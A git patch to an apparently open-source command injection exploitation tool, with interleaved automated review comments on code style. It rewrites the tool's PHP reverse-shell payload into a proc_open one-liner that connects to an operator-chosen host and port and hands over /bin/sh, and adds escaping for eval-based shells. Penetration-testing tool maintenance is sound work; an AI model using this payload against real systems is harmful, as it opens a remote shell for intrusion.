From fa8a9723e3197a30cca0dbbe5e855f3e5620a714 Mon Sep 17 00:00:00 2001
From: stasinopoulos
Date: Fri, 25 Oct 2024 08:41:24 +0300
Subject: [PATCH] Minor update regarding "PHP-reverse-shell" payload
---
 src/core/requests/requests.py | 1 +
 src/core/shells/bind_tcp.py | 2 ++
 src/core/shells/reverse_tcp.py | 4 +++-
 src/utils/settings.py | 2 +-
 4 files changed, 7 insertions(+), 2 deletions(-)
diff --git a/src/core/requests/requests.py b/src/core/requests/requests.py
index 8fc20e6d42..92e148c2cf 100755
--- a/src/core/requests/requests.py
+++ b/src/core/requests/requests.py
@@ -261,6 +261,7 @@ def estimate_response_time(url, timesec, http_request_method):
 Exceptions regarding requests failure(s)
 """
 def request_failed(err_msg):
+ settings.VALID_URL = False
 try:
diff --git a/src/core/shells/bind_tcp.py b/src/core/shells/bind_tcp.py
index bd1c622c4a..840519ddb7 100755
--- a/src/core/shells/bind_tcp.py
+++ b/src/core/shells/bind_tcp.py
@@ -323,6 +323,8 @@ def bind_tcp_options(separator):
 # Option 2 - Other (Netcat-Without-Netcat) shells
 elif bind_tcp_option == '2' :
 bind_tcp_option = other_bind_shells(separator)
+ if settings.EVAL_BASED_STATE != False:
+ bind_tcp_option = bind_tcp_option.replace("$","\\$")
 if bind_tcp_option.lower() not in settings.SHELL_OPTIONS:
 checks.shell_success("bind")
 break
diff --git a/src/core/shells/reverse_tcp.py b/src/core/shells/reverse_tcp.py
index e901ee2a6f..c953f01723 100755
--- a/src/core/shells/reverse_tcp.py
+++ b/src/core/shells/reverse_tcp.py
@@ -116,7 +116,7 @@ def other_reverse_shells(separator):
 # PHP-reverse-shell
 if other_shell == '1':
 other_shell = "php -r '$sock=fsockopen(\"" + settings.LHOST + "\"," + settings.LPORT + ");" \
- "exec(\"/bin/sh -i <%263 >%263 2>%263\");'"
+ "$proc=proc_open(\"/bin/sh -i\",array(0%3d>$sock,1%3d>$sock,2%3d>$sock),$pipes);'"
 break
 # Perl-reverse-shell
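Review bot: `settings.VALID_URL = False` is now the first statement of `request_failed`, ahead of the `try`, so the flag is cleared for every failure the handler is about to classify, and nothing in this hunk ever sets it back to True. If any of the branches below treat a failure as transient or recoverable, the assignment belongs in the branches that actually give up on the target rather than at the top of the function. If clearing it unconditionally is intended, a one-line comment such as `# any request failure marks the current target URL as unusable for the rest of the run` would record that. The body of `request_failed` continues outside the hunk, so the handled cases are not visible here.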
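Review bot: `if settings.EVAL_BASED_STATE != False:` tests a flag by comparing it against False, which also passes for None or any other non-False value; the idiomatic guard is `if settings.EVAL_BASED_STATE:`. The same two added lines are duplicated verbatim in reverse_tcp.py at `@@ -500,6 +500,8 @@` with `reverse_tcp_option`, so the escaping rule now lives in two menus that can drift apart; a small shared helper (e.g. in `checks`, which both files already import) called from both places would keep them in step. Neither hunk records why `$` needs escaping only in the eval-based state, so a one-line comment naming the reason above the `if` would help the next maintainer. The enclosing `bind_tcp_options` starts and ends outside the hunk.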
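Review bot: The rewritten PHP line carries no comment explaining why the `proc_open` form replaced the previous `exec` form, and the subject line only calls it a "minor update", so a future reader has no record of the motivation for the change. A one-line comment above the `other_shell =` assignment stating that motivation would preserve it; the commit message would be the other natural place. `other_reverse_shells` starts and ends outside the hunk.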
@@ -500,6 +500,8 @@ def reverse_tcp_options(separator):
 # Option 2 - Other (Netcat-Without-Netcat) shells
 elif reverse_tcp_option == '2' :
 reverse_tcp_option = other_reverse_shells(separator)
+ if settings.EVAL_BASED_STATE != False:
+ reverse_tcp_option = reverse_tcp_option.replace("$","\\$")
 if reverse_tcp_option.lower() not in settings.SHELL_OPTIONS:
 checks.shell_success("reverse")
 break
diff --git a/src/utils/settings.py b/src/utils/settings.py
index 38f5fed956..ca3440f045 100755
--- a/src/utils/settings.py
+++ b/src/utils/settings.py
@@ -262,7 +262,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR = "Anastasios Stasinopoulos"
 VERSION_NUM = "4.0"
-REVISION = "105"
+REVISION = "106"
 STABLE_RELEASE = False
 VERSION = "v"
 if STABLE_RELEASE: